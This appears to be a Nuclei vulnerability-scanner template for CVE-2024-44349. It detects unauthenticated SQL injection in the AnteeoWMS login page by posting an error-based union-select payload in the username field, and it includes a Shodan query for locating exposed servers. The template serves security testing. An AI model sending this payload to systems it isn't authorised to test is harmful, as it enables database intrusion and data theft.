id: CVE-2024-44349

info:
  name: AnteeoWMS < v4.7.34 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
  reference:
    - https://blog.cybergon.com/posts/cve-2024-44349/
    - http://nvd.nist.gov/vuln/detail/CVE-2024-44349
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-44349
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ANTEEO"
  tags: cve,cve2024,sqli,anteeowms

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /default.aspx HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: viewstate
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'

      - type: regex
        part: body
        name: viewstategen
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'

      - type: regex
        part: body
        name: eventval
        internal: true
        group: 1
        regex:
          - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'

  - raw:
      - |
        POST /default.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server'
# digest: 4a0a0047304502205a5bc70a82453302b02d97fb6b99d6a726505ee73b0815574e381ac7224c09050221008795017bf36669ad6b978ae76fd3ff3868aea81a23c27898e0436cc657b7e0e7:922c64590222798bb761d5b6d8e72950